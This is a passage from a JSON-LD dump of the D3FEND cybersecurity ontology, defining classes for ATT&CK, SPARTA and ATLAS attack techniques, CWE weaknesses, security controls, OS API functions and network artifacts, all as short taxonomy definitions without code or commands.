      "d3f:definition": "The heap segment (or free store) is a large pool of memory from which dynamic memory requests of a process are allocated and satisfied.",
      "rdfs:label": "Heap Segment",
      "rdfs:seeAlso": {
        "@id": "http://dbpedia.org/resource/Memory_management#HEAP"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:LM-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0007",
      "d3f:definition": "Movement is achieved by reusing legitimate credentials and keys to cross boundaries that rely on trust rather than strict isolation. Using operator or service accounts, maintenance logins, station certificates, or spacecraft-recognized crypto, the adversary invokes gateways that bridge domains, C&DH to payload, crosslink routers to onboard networks, or constellation management planes to individual vehicles. Because the traversal occurs through approved interfaces (file services, table loaders, remote procedure calls, crosslink tasking), actions appear as routine operations while reaching progressively more privileged subsystems or neighboring spacecraft. Where roles and scopes are broad or reused, the same credential opens multiple enclaves, turning authorization itself into the lateral path.",
      "rdfs:label": "Credentialed Traversal - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Credentialed Traversal"
    },
    {
      "@id": "d3f:LinuxVfork",
      "@type": "owl:Class",
      "d3f:definition": "Create child process that temp suspends parent process until it terminates.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/vfork.2.html"
      },
      "rdfs:label": "Linux Vfork",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:SPARTAInitialAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0003"
      },
      "rdfs:label": "Initial Access Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:N870f88b13b08432eb88cf51426eb8e8a"
        }
      ],
      "skos:prefLabel": "Initial Access Technique"
    },
    {
      "@id": "_:N870f88b13b08432eb88cf51426eb8e8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0003"
      }
    },
    {
      "@id": "d3f:T1420",
      "@type": "owl:Class",
      "d3f:attack-id": "T1420",
      "d3f:definition": "Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions.",
      "rdfs:label": "File and Directory Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "File and Directory Discovery"
    },
    {
      "@id": "d3f:OSAPIReadMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that reads the contents of memory from a specific address or region.",
      "d3f:invokes": {
        "@id": "d3f:ReadMemory"
      },
      "rdfs:label": "OS API Read Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N7366e6d18bf54732ac121238a30d7ff0"
        }
      ]
    },
    {
      "@id": "_:N7366e6d18bf54732ac121238a30d7ff0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ReadMemory"
      }
    },
    {
      "@id": "d3f:TA0030",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Defense Evasion - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Defense Evasion"
    },
    {
      "@id": "d3f:OTPowerSupply",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OT power supply is a power supply whose control amplifier is optimized for signal-processing tasks rather than supplying mere steady-state power to a load. It is a self-contained combination of operational amplifiers, power amplifiers, and integral power circuits designed for higher-level operations in industrial or OT contexts.",
      "rdfs:label": "OT Power Supply",
      "rdfs:seeAlso": {
        "@id": "https://ieeexplore.ieee.org/servlet/opac?punumber=4116785"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PowerSupply"
      },
      "skos:example": "Phoenix Contact QUINT, Eaton PSG, and many controller-branded power supplies."
    },
    {
      "@id": "d3f:ElectronicCombinationLockEvent",
      "@type": "owl:Class",
      "rdfs:comment": "An event occuring when combination lock's bolt changes position.",
      "rdfs:label": "Electronic Combination Lock Event",
      "rdfs:seeAlso": "NRC Regulatory Guide 5.12 Rev1",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessAlarmEvent"
        },
        {
          "@id": "_:Nb92fc156928c423fb87b1569baa93eac"
        }
      ]
    },
    {
      "@id": "_:Nb92fc156928c423fb87b1569baa93eac",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ElectronicCombinationLock"
      }
    },
    {
      "@id": "d3f:LocalAreaNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A local area network (LAN) is a computer network that interconnects computers within a limited area such as a residence, school, laboratory, university campus or office building and has its network equipment and interconnects locally managed. Ethernet and Wi-Fi are the two most common transmission technologies in use for local area networks. Historical technologies include ARCNET, Token ring, and AppleTalk.",
      "d3f:may-contain": {
        "@id": "d3f:Host"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Local_area_network"
      },
      "rdfs:label": "Local Area Network",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Network"
        },
        {
          "@id": "_:Ndc0bda103c8d49b7835c69a8ee3fa62e"
        }
      ],
      "skos:altLabel": "LAN"
    },
    {
      "@id": "_:Ndc0bda103c8d49b7835c69a8ee3fa62e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:T1090.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1090.001",
      "d3f:definition": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.",
      "d3f:produces": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "rdfs:label": "Internal Proxy",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1090"
        },
        {
          "@id": "_:Nd1b7dd6bc31a4562bdabffc80564fe3c"
        }
      ]
    },
    {
      "@id": "_:Nd1b7dd6bc31a4562bdabffc80564fe3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:FileUnmountEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file system or storage volume is unmounted, disconnecting its files and directories from the operating system or applications.",
      "rdfs:label": "File Unmount Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:N0cf0301c1c744c14b961b9be3b3e15a4"
        }
      ]
    },
    {
      "@id": "_:N0cf0301c1c744c14b961b9be3b3e15a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMountEvent"
      }
    },
    {
      "@id": "d3f:CWE-274",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-274",
      "d3f:definition": "The product does not handle or incorrectly handles when it has insufficient privileges to perform an operation, leading to resultant weaknesses.",
      "rdfs:label": "Improper Handling of Insufficient Privileges",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-269"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:CWE-295",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-295",
      "d3f:definition": "The product does not validate, or incorrectly validates, a certificate.",
      "rdfs:label": "Improper Certificate Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-287"
      }
    },
    {
      "@id": "d3f:T1048.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048.003",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over Unencrypted Non-C2 Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1048"
        },
        {
          "@id": "_:Nfb4998313f0a4fdebd1fa36e1c8f657c"
        }
      ]
    },
    {
      "@id": "_:Nfb4998313f0a4fdebd1fa36e1c8f657c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:uses",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x uses y: The entity x puts into service a resource or implement y; makes y work or employ for a particular purpose or for its inherent or natural purpose.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01161188-v"
      },
      "rdfs:label": "uses",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:FileFormatVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileFormatVerification"
      ],
      "d3f:analyzes": {
        "@id": "d3f:FileSection"
      },
      "d3f:d3fend-id": "D3-FFV",
      "d3f:definition": "Verifying that a file conforms to its expected format specifications",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-FileSecurityUsingFileFormatValidation_OPSWATInc"
      },
      "rdfs:label": "File Format Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ContentValidation"
        },
        {
          "@id": "_:Nf55f0d2f932c46e7a2367eca804e355c"
        }
      ]
    },
    {
      "@id": "_:Nf55f0d2f932c46e7a2367eca804e355c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:CWE-940",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-940",
      "d3f:definition": "The product establishes a communication channel to handle an incoming request that has been initiated by an actor, but it does not properly verify that the request is coming from the expected origin.",
      "rdfs:label": "Improper Verification of Source of a Communication Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-346"
        },
        {
          "@id": "d3f:CWE-923"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0001",
      "d3f:definition": "Much like the [Search Open Technical Databases](/techniques/AML.T0000), there is often ample research available on the vulnerabilities of common AI models. Once a target has been identified, an adversary will likely try to identify any pre-existing work that has been done for this class of models.\nThis will include not only reading academic papers that may identify the particulars of a successful attack, but also identifying pre-existing implementations of those attacks. The adversary may obtain [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or develop their own [Adversarial AI Attacks](/techniques/AML.T0017.000) if necessary.",
      "rdfs:label": "Search Open AI Vulnerability Analysis - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Open AI Vulnerability Analysis"
    },
    {
      "@id": "d3f:CCI-001454_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization ensures that remote sessions for accessing an organization-defined list of security functions and security-relevant information are audited.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001454"
    },
    {
      "@id": "d3f:CWE-480",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-480",
      "d3f:definition": "The product accidentally uses the wrong operator, which changes the logic in security-relevant ways.",
      "rdfs:label": "Use of Incorrect Operator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:ATTACKICSTechnique",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK ICS Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSThing"
      }
    },
    {
      "@id": "d3f:input-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x input-of y: An artifact x is input of an event y iff x participates at the start of y, provides the material or information required for y to begin, and during y either x's state is altered or the information content it bears is realized.",
      "rdfs:domain": {
        "@id": "d3f:Artifact"
      },
      "rdfs:label": "input-of",
      "rdfs:range": {
        "@id": "d3f:Event"
      },
      "rdfs:seeAlso": {
        "@id": "https://www.commoncoreontologies.org/ont00001841"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:participates-in"
      }
    },
    {
      "@id": "d3f:OTNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:OTEmbeddedComputer"
      },
      "d3f:definition": "A computer network which connects OT devices.",
      "d3f:may-contain": {
        "@id": "d3f:OTEngineeringWorkstation"
      },
      "rdfs:label": "OT Network",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IntranetNetwork"
        },
        {
          "@id": "_:N78d42ad974854e23ac571bc36c3b87c2"
        },
        {
          "@id": "_:N43a4c93cde604307ac394aeed8f36ce5"
        }
      ]
    },
    {
      "@id": "_:N78d42ad974854e23ac571bc36c3b87c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEmbeddedComputer"
      }
    },
    {
      "@id": "_:N43a4c93cde604307ac394aeed8f36ce5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEngineeringWorkstation"
      }
    },
    {
      "@id": "d3f:WindowsVirtualAllocEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Reserves, commits, or changes the state of a region of memory within the virtual address space of a specified process. The function initializes the memory it allocates to zero.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtAllocateVirtualMemory"
        },
        {
          "@id": "d3f:WindowsNtProtectVirtualMemory"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex"
      },
      "rdfs:label": "Windows VirtualAllocEx",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIAllocateMemory"
        },
        {
          "@id": "_:N9f4c077bfce64ffa89adbbff6cdbb11f"
        },
        {
          "@id": "_:N73363a9994d546cf81026f10388fa181"
        }
      ]
    },
    {
      "@id": "_:N9f4c077bfce64ffa89adbbff6cdbb11f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtAllocateVirtualMemory"
      }
    },
    {
      "@id": "_:N73363a9994d546cf81026f10388fa181",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtProtectVirtualMemory"
      }
    },
    {
      "@id": "d3f:Reference-ExecutionWithAT_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-004/"
      },
      "d3f:kb-abstract": "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows built-in command AT (at.exe) to schedule a command to be run at a specified time, date, and even host. This method has been used by adversaries and administrators alike. Its use may lead to detection of compromised hosts and compromised users if it is used to move laterally. The built-in Windows tool schtasks.exe (CAR-2013-08-001) offers greater flexibility when creating, modifying, and enumerating tasks. For these reasons, schtasks.exe is more commonly used by administrators, tools/scripts, and power users.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ScheduledJobAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-004: Execution with AT",
      "rdfs:label": "Reference - CAR-2013-05-004: Execution with AT - MITRE"
    },
    {
      "@id": "d3f:Reference-IdentifyingADenial-of-serviceAttackInACloud-basedProxyService-CloudfareInc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8613089B1"
      },
      "d3f:kb-abstract": "A cloud-based proxy service identifies a denial-of-service (DoS) attack including determining that there is a potential DoS attack being directed to an IP address of the cloud-based proxy service; and responsive to determining that there are a plurality of domains that resolve to that IP address, identifying the one of the plurality of domains that is the target of the DoS attack. The domain that is under attack is identified by scattering the plurality of domains to resolve to different IP addresses, where a result of the scattering is that each of those domains resolves to a different IP address, and identifying one of those plurality of domains as the target of the DoS attack by determining that there is an abnormally high amount of traffic being directed to the IP address in which that domain resolves.",
      "d3f:kb-author": "Lee Hahn Holloway, Srikanth N. Rao, Matthew Browning Prince, Matthieu Philippe Francois Tourne, Ian Gerald Pye, Ray Raymond Bejjani, Terry Paul Rodery, Jr.",
      "d3f:kb-organization": "Cloudfare Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundSessionVolumeAnalysis"
      },
      "d3f:kb-reference-title": "Identifying a denial-of-service attack in a cloud-based proxy service",
      "rdfs:label": "Reference - Identifying a denial-of-service attack in a cloud-based proxy service - Cloudfare Inc."
    },
    {
      "@id": "d3f:EmulatedFileAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:EmulatedFileAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:DocumentFile"
        },
        {
          "@id": "d3f:ExecutableFile"
        }
      ],
      "d3f:d3fend-id": "D3-EFA",
      "d3f:definition": "Emulating instructions in a file looking for specific patterns.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Network-levelPolymorphicShellcodeDetectionUsingEmulation"
      },
      "rdfs:label": "Emulated File Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "_:Nedf014a766694d97878852992b703b6c"
        },
        {
          "@id": "_:N80960cb70fef4d0e872f79665d7d8366"
        }
      ]
    },
    {
      "@id": "_:Nedf014a766694d97878852992b703b6c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "_:N80960cb70fef4d0e872f79665d7d8366",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:T1552.006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:GroupPolicy"
      },
      "d3f:attack-id": "T1552.006",
      "d3f:definition": "Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)",
      "rdfs:label": "Group Policy Preferences",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:Na07d7ed1a2d64723aa32cc73e3ab2aec"
        }
      ]
    },
    {
      "@id": "_:Na07d7ed1a2d64723aa32cc73e3ab2aec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupPolicy"
      }
    },
    {
      "@id": "d3f:CWE-194",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-194",
      "d3f:definition": "The product performs an operation on a number that causes it to be sign extended when it is transformed into a larger data type. When the original number is negative, this can produce unexpected values that lead to resultant weaknesses.",
      "rdfs:label": "Unexpected Sign Extension",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:depends-on",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x depends-on y: The entity x is contingent on y being available; x relies on y.",
      "owl:inverseOf": {
        "@id": "d3f:has-dependent"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00729216-a"
      },
      "rdfs:label": "depends-on",
      "rdfs:seeAlso": {
        "@id": "https://www.cisa.gov/what-are-dependencies"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:DHCPInformEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP client sends an INFORM message to request configuration parameters, such as DNS or gateway information, without requiring IP address assignment.",
      "rdfs:label": "DHCP Inform Event",
      "rdfs:subClassOf": {
        "@id": "d3f:DHCPEvent"
      },
      "skos:altLabel": "DHCPINFORM"
    },
    {
      "@id": "d3f:CCI-002263_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in process.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002263"
    },
    {
      "@id": "d3f:T1055.012",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.012",
      "d3f:definition": "Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:modifies": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Process Hollowing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N991efc064c3a49a2bd959fa2ec6f0382"
        }
      ]
    },
    {
      "@id": "_:N991efc064c3a49a2bd959fa2ec6f0382",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:T1542.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1542.005",
      "d3f:creates": {
        "@id": "d3f:TFTPNetworkTraffic"
      },
      "d3f:definition": "Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.",
      "rdfs:label": "TFTP Boot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1542"
        },
        {
          "@id": "_:Nf8b3753143764a71813baee98d90843d"
        }
      ]
    },
    {
      "@id": "_:Nf8b3753143764a71813baee98d90843d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TFTPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:MicrosoftWordDOCBFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOCB File"
    },
    {
      "@id": "d3f:CWE-119",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-119",
      "d3f:definition": "The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.",
      "d3f:synonym": [
        "Buffer Overflow",
        "buffer overrun",
        "memory safety"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:RawMemoryAccessFunction"
      },
      "rdfs:label": "Improper Restriction of Operations within the Bounds of a Memory Buffer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-118"
        },
        {
          "@id": "_:Nbc14717f515947f990e1520c3c9d2243"
        }
      ]
    },
    {
      "@id": "_:Nbc14717f515947f990e1520c3c9d2243",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "d3f:EXF-0006.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EXF-0006.02",
      "d3f:definition": "On bent-pipe or regenerative transponders, configuration controls what is translated, amplified, and routed. An adversary can remap input–output paths, shift translation frequencies, adjust polarization or gain to favor non-mission receivers, or enable auxiliary ports so selected virtual channels or recorder playbacks are forwarded outside the planned ground segment. In regenerative systems, edited routing tables or QoS rules can mirror traffic to an attacker-controlled endpoint. The result is a sanctioned-looking carrier that quietly delivers mission data to unauthorized listeners.",
      "d3f:modifies": {
        "@id": "d3f:SatelliteTransponder"
      },
      "rdfs:label": "Transponder - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0006/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EXF-0006"
        },
        {
          "@id": "_:Ne106d513865a44b4922612cb48518d98"
        }
      ],
      "skos:prefLabel": "Transponder"
    },
    {
      "@id": "_:Ne106d513865a44b4922612cb48518d98",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SatelliteTransponder"
      }
    },
    {
      "@id": "d3f:OTTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read, set, or calculate timing mechanisms.",
      "rdfs:comment": [
        "BACnet: timeSynchronization\nBACnet: utcTimeSynchronization ",
        "GE-SRTP: SET PLC TIME/DATE\nGE-SRTP: RETURN PLC TIME/DATE"
      ],
      "rdfs:label": "OT Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceManagementMessage"
      }
    },
    {
      "@id": "d3f:T1176.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1176.002",
      "d3f:definition": "Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. A malicious extension can be installed through an extension marketplace (i.e., [Compromise Software Dependencies and Development Tools](https://attack.mitre.org/techniques/T1195/001)) or side-loaded directly into the IDE.(Citation: Abramovsky VSCode Security)(Citation: Lakshmanan Visual Studio Marketplace)",
      "rdfs:label": "IDE Extensions",
      "rdfs:subClassOf": {
        "@id": "d3f:T1176"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-003%3ABCDEditFailureRecoveryModification_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-003/"
      },
      "d3f:kb-abstract": "This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-003: BCDEdit Failure Recovery Modification",
      "rdfs:label": "Reference - CAR-2021-05-003: BCDEdit Failure Recovery Modification - MITRE"
    },
    {
      "@id": "d3f:AML.T0060",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0060",
      "d3f:definition": "Adversaries may create an entity they control, such as a software package, website, or email address to a source hallucinated by an LLM. The hallucinations may take the form of package names commands, URLs, company names, or email addresses that point the victim to the entity controlled by the adversary. When the victim interacts with the adversary-controlled entity, the attack can proceed.",
      "rdfs:label": "Publish Hallucinated Entities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0060"
      },
      "rdfs:subClassOf": {
